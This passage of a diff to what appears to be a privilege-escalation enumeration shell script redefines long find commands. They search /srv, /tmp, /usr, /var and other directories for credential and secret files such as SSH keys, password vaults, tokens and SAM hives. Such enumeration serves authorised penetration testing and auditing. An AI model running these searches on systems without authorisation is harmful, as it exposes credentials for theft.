\"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYS=`eval_bckgrd "find /sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name 